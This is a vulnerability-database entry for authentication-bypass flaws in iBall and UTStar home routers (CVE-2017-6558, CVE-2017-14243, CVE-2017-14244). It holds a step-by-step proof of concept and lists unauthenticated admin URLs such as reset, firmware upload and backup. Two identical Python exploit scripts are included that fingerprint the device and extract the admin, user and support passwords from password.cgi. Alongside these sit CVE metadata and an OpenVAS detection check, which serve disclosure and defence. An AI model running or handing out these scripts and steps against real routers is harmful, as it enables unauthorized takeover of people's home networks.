ID 1337DAY-ID-28401 Type zdt Reporter Indrajith.A.N Modified 2017-08-30T00:00:00
Description
Exploit for cgi platform in category web applications
Title:
====
iball Baton 150M Wireless router - Authentication Bypass
Credit:
======
Name: Indrajith.A.N
Website: https://www.indrajithan.com
Date:
====
07-03-2017
Vendor:
======
Envisioning the tremendous potential for innovative products required by the
ever-evolving users in the computing and digital world, iBall was launched in
September 2001 and is one of the leading networking companies.
Product:
=======
iball Baton 150M Wireless-N ADSL2+ Router
Product link:
http://www.iball.co.in/Product/150M-Wireless-N-Broadband-Router/539
Abstract:
=======
The iball Baton 150M router's login page is insecurely developed: any
attacker can bypass the admin's authentication just by requesting the
password.cgi file directly.
Affected Version:
=============
Firmware Version : 1.2.6 build 110401 Rel.47776n
Hardware Version : iB-WRA150N v1 00000001
Exploitation-Technique:
===================
Remote
Severity Rating:
===================
9
Details:
=======
Any attacker can escalate their privileges to admin using this vulnerability.
Proof Of Concept:
================
1) Navigate to the router's login page, which is usually the IPv4 default
gateway IP, i.e. 172.20.174.1
2) Now just append password.cgi to the URL, i.e.
http://172.20.174.1/password.cgi
3) Right-click and View Source; the page source discloses the username,
password and user role of the admin in a comment section.
4) Successfully logged in using the disclosed credentials.
Reference:
=========
Video POC :
https://drive.google.com/file/d/0B6715xUqH18MS1J5Sk13emFkQmc/view?usp=sharing
Disclosure Timeline:
======================================
Vendor Notification: March 5, 2017
-----
Indrajith.A.N
# 0day.today [2018-01-11] #
{"cve": [{"lastseen": "2021-02-02T06:36:48", "description": "iball Baton 150M iB-WRA150N v1 00000001 1.2.6 build 110401 Rel.47776n devices are prone to an authentication bypass vulnerability that allows remote attackers to view and modify administrative router settings by reading the HTML source code of the password.cgi file.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-09T09:59:00", "title": "CVE-2017-6558", "type": "cve", "cwe": ["CWE-798"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6558"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:iball:baton_150m_wireless-n_router_firmware:1.2.6"], "id": "CVE-2017-6558", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-6558", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:iball:baton_150m_wireless-n_router_firmware:1.2.6:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2017-08-30T21:07:36", "description": "iBall Baton 150M Wireless Router - Authentication Bypass. CVE-2017-6558. 
Webapps exploit for PHP platform", "published": "2017-03-07T00:00:00", "type": "exploitdb", "title": "iBall Baton 150M Wireless Router - Authentication Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6558"], "modified": "2017-03-07T00:00:00", "id": "EDB-ID:42591", "href": "https://www.exploit-db.com/exploits/42591/", "sourceData": "Title:\r\n====\r\niball Baton 150M Wireless router - Authentication Bypass\r\n\r\nCredit:\r\n======\r\nName: Indrajith.A.N\r\nWebsite: https://www.indrajithan.com\r\n\r\nDate:\r\n====\r\n07-03-2017\r\n\r\nVendor:\r\n======\r\niball Envisioning the tremendous potential for innovative products required\r\nby the ever evolving users in computing and digital world, iBall was\r\nlaunched in September 2001 and which is one of the leading networking\r\ncompany\r\n\r\nProduct:\r\n=======\r\niball Baton 150M Wireless-N ADSI.2+ Router\r\n\r\nProduct link:\r\nhttp://www.iball.co.in/Product/150M-Wireless-N-Broadband-Router/539\r\n\r\nAbstract:\r\n=======\r\niball Baton 150M Router's login page is insecurely developed that any\r\nattacker could bypass the admin's authentication just by tweaking the\r\npassword.cgi file.\r\n\r\nAffected Version:\r\n=============\r\nFirmware Version : 1.2.6 build 110401 Rel.47776n\r\nHardware Version : iB-WRA150N v1 00000001\r\n\r\nExploitation-Technique:\r\n===================\r\nRemote\r\n\r\nSeverity Rating:\r\n===================\r\n9\r\n\r\nDetails:\r\n=======\r\nAny attacker can escalate his privilege to admin using this vulnerability.\r\n\r\nProof Of Concept:\r\n================\r\n1) Navigate to Routers Login page which is usually IPV4 default Gateway IP,\r\ni.e 172.20.174.1\r\n\r\n2) Now just append password.cgi to the URL i.e\r\nhttp://172.20.174.1/password.cgi\r\n\r\n3) Right-click and View Source code which disclsus the username, password\r\nand user role of the admin in the comment section\r\n\r\n4) Successfully logged in using the disclosed credentials.\r\n\r\nReference:\r\n=========\r\nVideo 
POC :\r\nhttps://drive.google.com/file/d/0B6715xUqH18MS1J5Sk13emFkQmc/view?usp=sharing\r\n\r\nDisclosure Timeline:\r\n======================================\r\nVendor Notification: March 5, 2017\r\n\r\n-----\r\nIndrajith.A.N", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/42591/"}], "openvas": [{"lastseen": "2020-05-12T17:06:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6558", "CVE-2017-14244"], "description": "The host is running iBall Baton 150M\n Wireless Router and is prone to authentication bypass vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2017-08-31T00:00:00", "id": "OPENVAS:1361412562310811313", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811313", "type": "openvas", "title": "iBall Baton 150M Wireless Router Authentication Bypass Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# iBall Baton 150M Wireless Router Authentication Bypass Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:iball:baton_150m_wireless-n_router\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811313\");\n script_version(\"2020-05-08T11:13:33+0000\");\n script_cve_id(\"CVE-2017-6558\", \"CVE-2017-14244\");\n script_bugtraq_id(96822);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 11:13:33 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-08-31 12:06:39 +0530 (Thu, 31 Aug 2017)\");\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_name(\"iBall Baton 150M Wireless Router Authentication Bypass Vulnerability\");\n\n script_tag(name:\"summary\", value:\"The host is running iBall Baton 150M\n Wireless Router and is prone to authentication bypass vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to get specific information or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - iball Baton 150M Router login page is insecurely developed and any attacker\n could bypass the admin authentication just by tweaking the password.cgi file.\n\n - iBall ADSL2+ Home Router does not properly authenticate when pages are\n accessed through cgi version.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to bypass authentication mechanism and perform\n unauthorized actions and can access sensitive information and perform actions\n such as reset router, downloading backup 
configuration, upload backup etc.\n This may lead to further attacks.\");\n\n script_tag(name:\"affected\", value:\"iBall Baton 150M Wireless-N ADSI.2+ Router 1.2.6 build 110401.\n iBall ADSL2+ Home Router WRA150N Firmware version FW_iB-LR7011A_1.0.2\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/42591\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/42740\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2017/Mar/22\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_iball_baton_150m_wireless_router_detect.nasl\");\n script_mandatory_keys(\"iBall_Baton_150M_Router/detected\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!netPort = get_app_port(cpe:CPE))\n exit(0);\n\nurl = \"/password.cgi\";\n\nreq = http_get(item: url, port:netPort);\nrcvRes = http_keepalive_send_recv(port:netPort, data:req);\n\nif(rcvRes =~ \"^HTTP/1\\.[01] 200\" && \">Access Control -- Password<\" >< rcvRes &&\n \"Access to your DSL router\" >< rcvRes && \"pwdAdmin =\" >< rcvRes &&\n \"pwdSupport =\" >< rcvRes && \"pwdUser =\" >< rcvRes)\n{\n report = http_report_vuln_url(port:netPort, url:url);\n security_message( port:netPort, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:15:10", 
"description": "### Exploit Title: iBall ADSL2+ Home Router Authentication Bypass Vulnerability\r\n* CVE: CVE-2017-14244\r\n* Date: 15-09-2017\r\n* Exploit Author: Gem George\r\n* Author Contact: https://www.linkedin.com/in/gemgrge\r\n* Vulnerable Product: iBall ADSL2+ Home Router WRA150N https://www.iball.co.in/Product/ADSL2--Home-Router/746\r\n* Firmware version: FW_iB-LR7011A_1.0.2\r\n* Vendor Homepage: https://www.iball.co.in\r\n* Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass\r\n \r\n \r\n### Vulnerability Details\r\niBall ADSL2+ Home Router does not properly authenticate when pages are accessed through cgi version. This could potentially allow a remote attacker access sensitive information and perform actions such as reset router, downloading backup configuration, upload backup etc.\r\n \r\n### How to reproduce\r\nSuppose 192.168.1.1 is the router IP and one of the valid page in router is is http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi\r\n \r\n### Example URLs:\r\n* http://192.168.1.1/info.cgi \u2013 Status and details\r\n* http://192.168.1.1/upload.cgi \u2013 Firmware Upgrade\r\n* http://192.168.1.1/backupsettings.cgi \u2013 perform backup settings to PC\r\n* http://192.168.1.1/pppoe.cgi \u2013 PPPoE settings\r\n* http://192.168.1.1/resetrouter.cgi \u2013 Router reset\r\n* http://192.168.1.1/password.cgi \u2013 password settings", "published": "2017-10-11T00:00:00", "type": "seebug", "title": "iBall ADSL2+ Home Router Authentication Bypass Vulnerability(CVE-2017-14244)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14243", "CVE-2017-14244", "CVE-2017-6558"], "modified": "2017-10-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96644", "id": "SSV:96644", "sourceData": "\n #/bin/python\r\n# -*- coding: utf-8 -*- \r\nimport sys\r\nimport os\r\nimport urllib2\r\nimport argparse\r\nimport re\r\nfrom termcolor 
import colored\r\n\r\ndef get_response(url):\r\n\tresponse = urllib2.urlopen(url)\r\n\treturn response.read()\r\n\r\ndef get_info(url):\r\n\tres = get_response(url + '/info.cgi')\r\n\tif \"iB-WRA150N\" in res: \t\r\n\t\tprint colored('[INF]','green'), 'Device identified: iBall 150M Wireless-N ADSL2+ Router (iB-WRA150N)'\r\n\t\tprint colored('[RES]', 'red'), 'Vulnerable to CVE-2017-6558'\r\n\t\tprint colored('[RES]', 'red'), 'Firmware Version: ' + find_between(res, '<td>', '</td>')\r\n\t\tget_cred(url)\r\n\telse:\r\n\t\tif \"ADSL2+\" in res:\t\t\r\n\t\t\tprint colored('[INF]','green'), 'Device identified: iBall ADSL2+ Home Router WRA150N'\r\n\t\t\tprint colored('[RES]','red'), 'Vulnerable to CVE-2017-14244'\r\n\t\t\tprint colored('[RES]','red'),'Firmware Version: FW' + find_between(res, 'FW', '</td>')\r\n\t\telse:\r\n\t\t\tif \"96338W\" in res:\t\r\n\t\t\t\tprint colored('[INF]','green'), 'Device identified: UTStar WA3002G4 ADSL Broadband Modem'\r\n\t\t\t\tprint colored('[RES]','red'), 'Vulnerable to CVE-2017-14243'\r\n\t\t\t\tget_cred(url)\r\n\t\t\telse:\r\n\t\t\t\tprint colored('[INF]','green'), 'Device not vulnerable to CVE-2017-6558, CVE-2017-14243 or CVE-2017-14244'\r\n\t\r\n\tprint colored('\\r\\nCompleted!\\r\\n','green'), \r\ndef get_cred(url):\r\n\tres = get_response(url + '/password.cgi')\r\n\tmatches = re.findall(\"(?<=\\s').*?(?=')\", res, re.DOTALL)\r\n\tprint '\\nUsernames\\tPasswords\\n', colored('---------\\t----------', 'green')\r\n\tprint 'admin\\t\\t' + matches[0] + '\\nuser\\t\\t' + matches[1] + '\\nsupport\\t\\t' + matches[2]\r\n\r\ndef find_between( s, first, last ):\r\n\ttry:\r\n\t\tstart = s.index( first ) + len( first )\r\n\t\tend = s.index( last, start )\r\n\t\treturn s[start:end]\r\n\texcept ValueError:\r\n \treturn \"\"\r\n\r\ndef display_info():\r\n\tprint 
colored('\\r\\n\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6','green')\r\n\tprint colored('\u00a6','green'), ' Check for CVE-2017-6558, CVE-2017-14243 & CVE-2017-14244\t', colored('\u00a6','green')\r\n\tprint colored('\u00a6','green'), '\t\t Created by: Gem George\t\t\t\t' , colored('\u00a6','green')\r\n\tprint colored('\u00a6','green'), '\t Website: https://www.techipick.com/ \t\t\t', colored('\u00a6','green')\r\n\tprint colored('\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6','green')\r\n\tprint \"\\r\\n\"\r\n\tprint colored('[SET]','blue'), 'Target URL: ', sys.argv[1]\r\n\r\ndef main():\r\n\tif len(sys.argv) != 2:\r\n\t\tprint 'Wrong argument count\\nEg: ' + os.path.basename(__file__) + ' http://192.168.1.1'\r\n\t\texit()\r\n\telse:\r\n\t\tdisplay_info()\t\t\r\n\t\turl = sys.argv[1].rstrip('/')\r\n\t\tget_info(url)\r\n \r\nif __name__ == \"__main__\":\r\n main()\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-96644"}, {"lastseen": "2017-11-19T12:15:10", "description": "### Exploit Title: UTStar WA3002G4 ADSL Broadband Modem Authentication Bypass Vulnerability\r\n* CVE: CVE-2017-14243\r\n* Date: 15-09-2017\r\n* Exploit Author: Gem George\r\n* Author Contact: 
https://www.linkedin.com/in/gemgrge\r\n* Vulnerable Product: UTStar WA3002G4 ADSL Broadband Modem\r\n* Firmware version: WA3002G4-0021.01\r\n* Vendor Homepage: http://www.utstar.com/\r\n* Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass\r\n \r\n \r\n### Vulnerability Details\r\nThe CGI version of the admin page of UTStar modem does not authenticate the user and hence any protected page in the modem can be directly accessed by replacing page extension with cgi. This could also allow anyone to perform operations such as reset modem, change passwords, backup configuration without any authentication. The modem also disclose passwords of each users (Admin, Support and User) in plain text behind the page source. \r\n \r\n### How to reproduce\r\n\r\nSuppose 192.168.1.1 is the device IP and one of the admin protected page in the modem is http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi\r\n \r\n### Example URLs:\r\n* http://192.168.1.1/info.cgi \u2013 Status and details\r\n* http://192.168.1.1/upload.cgi \u2013 Firmware Upgrade\r\n* http://192.168.1.1/backupsettings.cgi \u2013 perform backup settings to PC\r\n* http://192.168.1.1/pppoe.cgi \u2013 PPPoE settings\r\n* http://192.168.1.1/resetrouter.cgi \u2013 Router reset\r\n* http://192.168.1.1/password.cgi \u2013 password settings", "published": "2017-10-11T00:00:00", "type": "seebug", "title": "UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass(CVE-2017-14243)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14243", "CVE-2017-14244", "CVE-2017-6558"], "modified": "2017-10-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96645", "id": "SSV:96645", "sourceData": "\n #/bin/python\r\n# -*- coding: utf-8 -*- \r\nimport sys\r\nimport os\r\nimport urllib2\r\nimport argparse\r\nimport re\r\nfrom termcolor import colored\r\n\r\ndef get_response(url):\r\n\tresponse = 
urllib2.urlopen(url)\r\n\treturn response.read()\r\n\r\ndef get_info(url):\r\n\tres = get_response(url + '/info.cgi')\r\n\tif \"iB-WRA150N\" in res: \t\r\n\t\tprint colored('[INF]','green'), 'Device identified: iBall 150M Wireless-N ADSL2+ Router (iB-WRA150N)'\r\n\t\tprint colored('[RES]', 'red'), 'Vulnerable to CVE-2017-6558'\r\n\t\tprint colored('[RES]', 'red'), 'Firmware Version: ' + find_between(res, '<td>', '</td>')\r\n\t\tget_cred(url)\r\n\telse:\r\n\t\tif \"ADSL2+\" in res:\t\t\r\n\t\t\tprint colored('[INF]','green'), 'Device identified: iBall ADSL2+ Home Router WRA150N'\r\n\t\t\tprint colored('[RES]','red'), 'Vulnerable to CVE-2017-14244'\r\n\t\t\tprint colored('[RES]','red'),'Firmware Version: FW' + find_between(res, 'FW', '</td>')\r\n\t\telse:\r\n\t\t\tif \"96338W\" in res:\t\r\n\t\t\t\tprint colored('[INF]','green'), 'Device identified: UTStar WA3002G4 ADSL Broadband Modem'\r\n\t\t\t\tprint colored('[RES]','red'), 'Vulnerable to CVE-2017-14243'\r\n\t\t\t\tget_cred(url)\r\n\t\t\telse:\r\n\t\t\t\tprint colored('[INF]','green'), 'Device not vulnerable to CVE-2017-6558, CVE-2017-14243 or CVE-2017-14244'\r\n\t\r\n\tprint colored('\\r\\nCompleted!\\r\\n','green'), \r\ndef get_cred(url):\r\n\tres = get_response(url + '/password.cgi')\r\n\tmatches = re.findall(\"(?<=\\s').*?(?=')\", res, re.DOTALL)\r\n\tprint '\\nUsernames\\tPasswords\\n', colored('---------\\t----------', 'green')\r\n\tprint 'admin\\t\\t' + matches[0] + '\\nuser\\t\\t' + matches[1] + '\\nsupport\\t\\t' + matches[2]\r\n\r\ndef find_between( s, first, last ):\r\n\ttry:\r\n\t\tstart = s.index( first ) + len( first )\r\n\t\tend = s.index( last, start )\r\n\t\treturn s[start:end]\r\n\texcept ValueError:\r\n \treturn \"\"\r\n\r\ndef display_info():\r\n\tprint 
colored('\\r\\n\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6','green')\r\n\tprint colored('\u00a6','green'), ' Check for CVE-2017-6558, CVE-2017-14243 & CVE-2017-14244\t', colored('\u00a6','green')\r\n\tprint colored('\u00a6','green'), '\t\t Created by: Gem George\t\t\t\t' , colored('\u00a6','green')\r\n\tprint colored('\u00a6','green'), '\t Website: https://www.techipick.com/ \t\t\t', colored('\u00a6','green')\r\n\tprint colored('\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6','green')\r\n\tprint \"\\r\\n\"\r\n\tprint colored('[SET]','blue'), 'Target URL: ', sys.argv[1]\r\n\r\ndef main():\r\n\tif len(sys.argv) != 2:\r\n\t\tprint 'Wrong argument count\\nEg: ' + os.path.basename(__file__) + ' http://192.168.1.1'\r\n\t\texit()\r\n\telse:\r\n\t\tdisplay_info()\t\t\r\n\t\turl = sys.argv[1].rstrip('/')\r\n\t\tget_info(url)\r\n \r\nif __name__ == \"__main__\":\r\n main()\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-96645"}]}